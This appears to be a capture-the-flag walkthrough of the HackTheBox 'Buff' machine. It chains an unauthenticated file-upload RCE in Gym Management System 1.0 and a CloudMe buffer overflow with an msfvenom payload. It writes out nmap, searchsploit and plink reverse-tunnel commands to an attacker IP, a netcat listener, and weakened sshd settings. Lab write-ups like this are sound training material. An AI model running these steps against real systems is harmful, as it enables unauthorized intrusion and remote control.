1. Executive Summary
Buff, another windows machine, is vulnerable to unauthenticated remote code execution due to the obsolete used version of Gym Management System and buffer overflows from a service named CloudMe.
Attackers can perform Remote Code Execution (RCE) on the hosting web server by submitting a maliciously designed PHP file that overcomes the image upload filters in Gym Management System version 1.0 due to an unauthenticated file upload vulnerability.
2. Description
2.1 Enumeration
Let’s start with basic enumeration using Nmap. I always used the command below when I have to solve windows machine. (-sV is for version enumeration, -sC is for default scan script from Nmap Scripting Engine (NSE), -A is for the aggressive scan (provides a lot of valuable host information than normal scan), -p- scan all port (1–65535), -v is for verbose mode, -oA is for saving your scanning result into three format files (.nmap, .gnmap, and .xml).
nmap -sV -sC -A -p- -v -oA buff 10.10.10.198
The scan gave us the result in the following screenshot.
There are two open ports. I tried to access all the ports in my browser, turns out port 8080 actually gave us something worth giving attention to. There are five main menus on the website page.
a. Home
b. Package
c. Facilities
d. About
e. Contact
Fast skimming on the website, I found under the contact page that the website is using Gym Management Software 1.0. I tried to look for the existing exploit using searchsploit.
2.2 Exploitation
From the above list, there is one exploit that is in python format. So I tried to download it into my local machine, using “searchsploit -m 48506” command.
According to the exploit, Gym Management System version 1.0 suffers from an Unauthenticated File Upload Vulnerability. It said that we can access the ‘/upload.php’ page, as it does not check for an authenticated user session.
To run the exploit, you only need to add the website address and the port.
python 48506.py http://10.10.10.198:8080
Afterwards, the terminal will give you access to web shell as “buff\shaun”. If you are not familiar with web shell, you need to know that the shell only returns value. We are unable to move from one directory to another directory.
However since we have the capability to at least see something inside the machine, I tried to guess where the user flag is using command below and managed to read it.
Usually, the user flag is inside the Desktop repository belongs to one of users, but since we just knew “shaun” so it easier for us to check.
Now that we finally have user flag, our last task is to find root flag.
I tried to find valuable information using systeminfo command.
It said that the machine actually running on Microsoft Windows 10 Enterprise. I actually did not expect the machine is already using Windows 10 but after failing on trying some possible exploitation based on Windows Exploit Suggester, I stop and try to look for another hole.
So far we only have access using web shell, to get root flag at least we need to check on other repositories. To be able to perform that task, we need to upload netcat or nc.exe so we can use it to get shell sessions from the buff machine.
First we need to run SimpleHTTPServer, so that the buff machine can copy the selected file into their repository. (Remember the nc.exe should be under the same directory as our instant web server).
Ensure the nc.exe is already inside the C:\xampp\htdocs\gym\upload, by using “dir” command. Next, set a listener using port defined and run the netcat using command below.
Now that we can move to other directories, I tried to look around on shaun’s directory. First on C:\Users\shaun\Documents, there is a single file with bat format. I checked what this file actually do by reading it using type command. Turns out, the .bat file is used to run the web server.
Next, I found another “sus” file named CloudMe_1112.exe. I googled to get valuable information regarding the executable file. According to their official page, CloudMe is the most popular cloud / sync storage provider in Europe, and it is utilized in almost every country on the planet. The service combines cloud storage with data synchronization, allowing you to sync your mobile camera roll with other devices such as your tablet or television, sync information between PCs and mobile devices, and send and receive files with friends and coworkers.
Okay that is actually sounds very promising service. I tried to check if there is any existing exploit in CloudMe service.
I download 48389.py into my local machine and read the script. To fully used the exploit, we need to generate payload using msfvenom.
After that I need to change the payload inside the original exploit to payload that we just create using msfvenom. Now that our exploit is ready, we just need to run it.
However it looks like the buff machine does not have python installed on machine. And we don’t have permission to install it.
So the only possible way is to perform reverse ssh tunneling into our local machine, since we have installed python. First we need to upload plink.exe into buff machine. According to this incredible cheat sheet, plink.exe is like a console PuTTY version ( the options are very similar to a ssh client).
As this binary will be executed in the victim and it is a ssh client, we need to open our ssh service and port so we can have a reverse connection. Then, to forward a only locally accessible port to a port in our machine:
Start the ssh on our local machine. I tried to run the plink.exe. however it said that connection refused all the time. I check the forum, and it said that I need to change the ssh port since port 1–1000 mostly used, so I decided to use port 2222 and run the plink once again using following command.
C:\xampp\htdocs\gym\upload>plink.exe -l root -pw toor 10.10.16.8 -R 8888:127.0.0.1:8888 -P 2222
It give me another error, so I look up on the internet and found this page and this page very helpful. I added this following code into my /etc/ssh/sshd_config :
#Legacy changes
KexAlgorithms +diffie-hellman-group1-sha1
Ciphers +aes128-cbc
PermitRootLogin yes
Before re-run the exploit, I need to stop ssh service on my local machine and generate key again and later start the ssh. The following commands are executed in our local machine.
service ssh stop
ssh-keygen -A
service ssh start
Run plink.exe again after you start a listener using nc -nlvp 2224.
plink.exe -l root -pw toor 10.10.16.8 -R 8888:127.0.0.1:8888 -P 2224
We finally managed to get root flag. As usual the root flag is under Administrator\Desktop folder.
Finally our job is done.
